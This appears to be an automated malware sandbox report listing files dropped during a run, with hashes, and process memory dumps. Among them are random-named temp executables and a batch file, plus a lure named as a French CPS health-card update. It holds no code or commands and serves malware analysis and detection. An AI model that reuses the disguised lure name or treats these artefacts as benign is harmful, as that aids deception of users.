C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
77fad1dec6867fb7dd395c25c46d8ae5

SHA1
abfecfd6c63bb35ec88d98ef210adefc139d793e

SHA256
02b0ab469998ac630b421de245ee243599422e7f2c2f9714085fc5b837891784

SHA512
ac8d9d660992d076e46ffdb7422d4916789a7ca2f5737c711449f518745dee197ed1c08e50f81f92cb7d2d1ea94fe024e77a8295e1be05c5a49a0fd7495776d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
23ab96010bd846aca290ef7ec458b7e5

SHA1
de15698dbb1554fc51e8b77b762da6d3f5f16884

SHA256
2d95b1a02cc18a3ae4ab7b48195d52c057bcb0cab3dc91335021b3f670dcfb44

SHA512
a8ce1dd7c0cbdb24bc7a3e702bb0bdf40468b7e48a55beb09eeca2e69ab43e4b2e759d37d3267f6d12bb7ded6c5fe4b04f1787660733113d6fe06a45cb535198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fb4cb72fdb972bec9083e291598e5107

SHA1
6208b997143f2ab175ac2bc5b827547c01ba9339

SHA256
a68190a9f6559f74a8c0ac2eef3b36b990d2cc032d8e3b565b6db38ac2f33ef6

SHA512
3b34b2ec66dc18869c75207d9a6b3001d4ba451404de7e64aaab3b41f822607aeb8997963d925bf1363d00ee354c44574b87c5573d8a3f044625992fc8614ba5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2d9ea73c271cd7238b44d7dfe154a93a

SHA1
283b1bcbcc8b960cdbc99e179e9c163eb958ee63

SHA256
bba8866ade2d909eb45eeb398825a14b69d241ab0d1d8ec5692ff200e14f9bda

SHA512
6a7f857985808ecc7c862deeadd9c44113f31f8d56d1b6d41289e7000789b59947d8f0be4a027f4e5e139433fb7d57936ebc48d3ce084af8dcd96f5c5008ce79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2bb005f08e40b9d8c31f1c09da44565d

SHA1
8a7097ecaeca704b6d653bfedea449cfbe79072f

SHA256
d7c96f73a5074bd88297839f5e749996eb91510490acd18d16edd5751f087943

SHA512
3da328cd8050288fcd5e9545812f5b0767aa9c19674d6f6f5dc35e92d436b2690056018910ff5a90f33c1f6d9602c70a256637d52498f1794efc8617fea6cbe3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
394fdc2b66a076f92c65a55b311f2781

SHA1
679cd7cbede15479d33af8fde755609361e043a9

SHA256
17c77279f69c25bcb5f8c60b1666c54236d6bacbedbcfabb374ea8661b32fff5

SHA512
80357d4041a150fd2e78dc253aef98dd5ddf5125f3cc86c1b4e5456cf9ac93fab9b99be9854363895f8027468a267415e675a9acdbab03f089dac19963f0c12c

Download Submit
C:\Users\Admin\AppData\Local\Temp\03fzai5a.ttf

Filesize
152KB

MD5
73bd1e15afb04648c24593e8ba13e983

SHA1
4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

SHA256
aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

SHA512
6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\0ogrr3pu.gy4

Filesize
124KB

MD5
9618e15b04a4ddb39ed6c496575f6f95

SHA1
1c28f8750e5555776b3c80b187c5d15a443a7412

SHA256
a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

SHA512
f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mjnytflm.gqo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hycvpe.exe

Filesize
45KB

MD5
a2eea60f1991928460eca53fb86f127b

SHA1
b5d31c9b199a9754a3ee7d7b9d35f8a98ed3b340

SHA256
373c2274f9add075ba56475a4ac45a313b118fbf88c2025923870c25e794a1a7

SHA512
7e3f2551fa8aebb04ad811613b934af4c930e79b1f743d8ddf0bc6cf92c9fb23f6500e38b315fe7bd59bc582de3c759f7016f51d03aa5fc826eba0c515125876

Download Submit
C:\Users\Admin\AppData\Local\Temp\j5u1g0nb.b3m

Filesize
100KB

MD5
d532d2d49803a2ef9a4775ea6de6d406

SHA1
ce5bb5ad4c2ed2bf950092b40f025e333da9731a

SHA256
470f1494b5d42d70276e690da4d986bc1be92e2954898eead91830f2228b8127

SHA512
f1a843825560c1e202c4c24990bf58611281a25eeabea526613fe0640da4a9c1538689076e6790668f4948077af5a804937d7ff7e64296b499f4b01554cc2330

Download Submit
C:\Users\Admin\AppData\Local\Temp\li3e2pma.db4

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Temp\ssxnqp.exe

Filesize
75KB

MD5
a7d63348cfe9b0dc9d3aaec28c76c8f0

SHA1
1b993f554960286e90cfd7cedf4c457e1c46ff80

SHA256
16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54

SHA512
3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC9E7.tmp.bat

Filesize
150B

MD5
57b6baa0215334596a481eb6be51bc02

SHA1
ac522735e78d7e6096d602dbefe2e15d5d91a9d9

SHA256
b90c1b1d112b46f3a30f970d1163f84ee495d262935a4612e23c88ef6c35494b

SHA512
2d866d70898127cd330126073bd197756abd9153f976c3eaf9d4c585b810ccd375ca60ebec41c6d0a94f2e2fa444596d2ded677b9ee67359c768d86c55db8626

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD8CC.tmp

Filesize
1KB

MD5
5bea5ced87f0370d9d1b0aa48c74d734

SHA1
96894f7336550c27618507aa0432b2aa71825055

SHA256
6c1339f25e5e40d740bafc7ec2a745f7202eb92c3830744f7e82a685225859fa

SHA512
d865a31466dc2a01d88eca0b11a55d33204d61e32a53c25a94133a841f27fff30ee0e0f92126c5620300179d6a88d6c64b53e182301b7813bd0ce0ee654a74aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\xfjdwl.exe

Filesize
81KB

MD5
d51105f68921195b994396e985fbfdbc

SHA1
3e6bbb261ceb5329cda79b024bdf6fed8e5162b3

SHA256
367c1eadd33c8f7a9801654054a1879e44b43aafdf3b672862567c264030490c

SHA512
55e5ad7779963895a53e4778631a9c98042a7c3203620e4bc4f168eaa402e2f87827624789f017a5e6b0a4fb51464fde75e4d8e5b8471325e2d958f0f676d390

Download Submit
C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe

Filesize
167KB

MD5
d0685487fa7e474e68a40a1b1ff49b60

SHA1
069285708e07814d852bbd5f39a7ffbb3c9e2d94

SHA256
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6

SHA512
eda00ba1453a33024fc05316196ccd71981ba61ababb965d1c3f01251f377047b00d8b6a9b140acf335cfa9d478bb3b6dbc4aca37fe74cfecb929e965ed190a8

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
memory/516-4-0x000001A1F14B0000-0x000001A1F14C0000-memory.dmp

Filesize
64KB

Download
memory/516-2-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/516-17-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/516-10-0x000001A1F35D0000-0x000001A1F35F2000-memory.dmp

Filesize
136KB

Download
memory/516-3-0x000001A1F14B0000-0x000001A1F14C0000-memory.dmp

Filesize
64KB

Download
memory/1488-104-0x0000000000970000-0x0000000000988000-memory.dmp

Filesize
96KB

Download
memory/1488-105-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/1488-186-0x00007FFD0CE10000-0x00007FFD0D005000-memory.dmp

Filesize
2.0MB

Download
memory/1488-184-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/1488-182-0x00007FFD0CE10000-0x00007FFD0D005000-memory.dmp

Filesize
2.0MB

Download
memory/2276-275-0x000002231D7E0000-0x000002231D7F0000-memory.dmp

Filesize
64KB

Download
memory/2276-282-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/2276-271-0x000002231D7E0000-0x000002231D7F0000-memory.dmp

Filesize
64KB

Download
memory/2276-270-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/2420-107-0x000000001E520000-0x000000001E640000-memory.dmp

Filesize
1.1MB

Download
memory/2420-67-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/2420-1-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/2420-0-0x0000000000060000-0x0000000000090000-memory.dmp

Filesize
192KB

Download
memory/2420-106-0x000000001E740000-0x000000001E74E000-memory.dmp

Filesize
56KB

Download
memory/2420-71-0x000000001E820000-0x000000001E82E000-memory.dmp

Filesize
56KB

Download
memory/2760-242-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/2760-263-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/2760-246-0x000001D422310000-0x000001D422320000-memory.dmp

Filesize
64KB

Download
memory/2760-244-0x000001D422310000-0x000001D422320000-memory.dmp

Filesize
64KB

Download
memory/2796-229-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/2796-210-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/2980-164-0x0000000075160000-0x0000000075910000-memory.dmp

Filesize
7.7MB

Download
memory/2980-109-0x0000000000FC0000-0x0000000000FD2000-memory.dmp

Filesize
72KB

Download
memory/2980-108-0x0000000075160000-0x0000000075910000-memory.dmp

Filesize
7.7MB

Download
memory/3308-33-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/3308-30-0x0000022839420000-0x0000022839430000-memory.dmp

Filesize
64KB

Download
memory/3308-29-0x0000022839420000-0x0000022839430000-memory.dmp

Filesize
64KB

Download
memory/3308-24-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/3988-298-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4132-183-0x00000270CBE90000-0x00000270CBEA0000-memory.dmp

Filesize
64KB

Download
memory/4132-213-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4132-185-0x00000270CBE90000-0x00000270CBEA0000-memory.dmp

Filesize
64KB

Download
memory/4132-197-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4224-248-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4224-260-0x00000260E2610000-0x00000260E2620000-memory.dmp

Filesize
64KB

Download
memory/4224-259-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4320-225-0x000001E65F6F0000-0x000001E65F700000-memory.dmp

Filesize
64KB

Download
memory/4320-214-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4320-215-0x000001E65F6F0000-0x000001E65F700000-memory.dmp

Filesize
64KB

Download
memory/4320-243-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4412-230-0x0000000075160000-0x0000000075910000-memory.dmp

Filesize
7.7MB

Download
memory/4412-245-0x00000000057F0000-0x0000000005800000-memory.dmp

Filesize
64KB

Download
memory/4412-165-0x00000000057F0000-0x0000000005800000-memory.dmp

Filesize
64KB

Download
memory/4412-163-0x0000000075160000-0x0000000075910000-memory.dmp

Filesize
7.7MB

Download
memory/4576-91-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4576-112-0x000000001B9F0000-0x000000001BA00000-memory.dmp

Filesize
64KB

Download
memory/4576-187-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4576-227-0x000000001B9F0000-0x000000001BA00000-memory.dmp

Filesize
64KB

Download
memory/4576-89-0x0000000000D10000-0x0000000000D2A000-memory.dmp

Filesize
104KB

Download
memory/4840-166-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4840-177-0x0000018974200000-0x0000018974210000-memory.dmp

Filesize
64KB

Download
memory/4840-200-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4928-47-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/4928-45-0x0000026E7B650000-0x0000026E7B660000-memory.dmp

Filesize
64KB

Download
memory/4928-43-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/5088-62-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download
memory/5088-58-0x0000025976E50000-0x0000025976E60000-memory.dmp

Filesize
64KB

Download
memory/5088-59-0x0000025976E50000-0x0000025976E60000-memory.dmp

Filesize
64KB

Download
memory/5088-57-0x00007FFCEEDB0000-0x00007FFCEF871000-memory.dmp

Filesize
10.8MB

Download